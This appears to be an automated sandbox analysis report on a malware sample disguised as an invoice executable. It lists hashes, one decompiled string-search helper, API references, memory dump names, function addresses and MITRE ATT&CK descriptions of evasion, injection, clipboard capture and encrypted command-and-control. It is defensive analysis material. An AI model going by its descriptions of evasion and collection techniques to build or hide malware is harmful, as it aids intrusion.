API String ID: 1780285237-0
Opcode ID: f3d342cf0a32f8b5f37ee32e90754e8470d22d221b5fa6942aa25712f4d7abe3
Instruction ID: 27d18b27ee7e673131eb8a466f875cb688b57f9e042b625c227d2d844990c6c8
Opcode Fuzzy Hash: f3d342cf0a32f8b5f37ee32e90754e8470d22d221b5fa6942aa25712f4d7abe3
Instruction Fuzzy Hash: 6C31B5B29442449FE7018F6DE998B267FFEFF09344B24592DE846C6168D73DD906CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00405BD2, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BD2(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405be2
0x00405be4
0x00405be7
0x00405c13
0x00405bec
0x00405bf5
0x00405bfa
0x00405c05
0x00405c08
0x00405c24
0x00405c0a
0x00405c11
0x00000000
0x00405c11
0x00405c1d
0x00405c21
0x00405c21
0x00405c1b
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BFA
CharNextA.USER32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C0B
lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction ID: c18a7a17a862b3ccaab34bb7c38a9d703f10cc619688c1102a12456a902c3210
Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction Fuzzy Hash: 65F0F631208914FFDB12DFA4DD40D9EBBB8EF56354B2540B9E840FB210D674EE019BA8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Invoice 6500TH21Y5674.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: Invoice 6500TH21Y5674.exe PID: 6928 Parent PID: 5948

General

Function 00403325, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 72AB1A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Function 0040589C, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00406448, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 004038E7, Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 00402EA1, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 004030D8, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 161
COMMON

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 004056C1, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 0040646F, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405C9C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 72AB16DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 004064DD, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 00405C6D, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405C48, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 0040573E, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 00405D14, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 00405CE5, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 72AB2921, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Function 004032DD, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 10003DDD, Relevance: .1, Instructions: 89
COMMON

Function 10001130, Relevance: .1, Instructions: 84
COMMON

Function 00405339, Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Function 004045EA, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274
stringCOMMON

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Function 1000410A, Relevance: .0, Instructions: 32
COMMON

Function 10003F0F, Relevance: .0, Instructions: 10
COMMON

Function 00404B5D, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Function 00403C84, Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 004042C3, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 202
windowstringCOMMON

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Function 00405D43, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Function 00406167, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 199
stringCOMMON

Function 004051FB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 004063AF, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Function 004041BF, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Function 72AB24D8, Relevance: 10.6, APIs: 7, Instructions: 124
COMMON

Function 00404AAB, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Function 00402DBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Function 72AB22F1, Relevance: 9.1, APIs: 6, Instructions: 140
memoryCOMMON

Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Function 72AB1837, Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Function 004049A1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Function 00405B5A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
stringCOMMON

Function 00405A6C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Function 00405B05, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Function 00402E3D, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Function 0040516F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Function 00405773, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Function 00403852, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Function 00405AB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Function 72AB10E0, Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON